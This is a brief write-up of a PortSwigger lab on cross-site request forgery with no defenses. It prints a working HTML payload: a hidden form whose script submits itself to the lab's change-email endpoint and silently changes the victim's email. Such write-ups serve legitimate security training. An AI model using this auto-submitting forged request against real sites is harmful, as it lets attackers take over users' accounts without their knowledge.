1.5 KiB
Portswigger CSRF Lab - 1
CSRF vulnerability with no defenses
In this lab we have to perfrom CSRF (Cross Site Request Forgery) which allows a user to make unintentional requests like changing user's email address which is the objective of this lab
We are given credentials to log into our account
We can update the email address from this page but this isn't the way we have to update it
If we look at the source code we can see the html for this form
We have Go to exploit server (I don't have it now since I have solved this lab) , so going to that we will have options like store , exploit ,deliver exploit and access logs so first we need to craf a csrf exploit for that we need to copy the same html form content and in action paramter we add the url with /my-account/change-email
<html>
<body>
<form action="https://ac771fae1eadea59c0730ef5005c00f2.web-security-academy.net/my-account/change-email" method="POST">
<input required type="hidden" name="email" value="ez@swigger.com">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
It's not necessary to make the input hidden but real csrf attacks like this where you don't see any input when you click a link and something happens in the back , so this request will make the email changed to ez@swigger.com and with this we completed this lab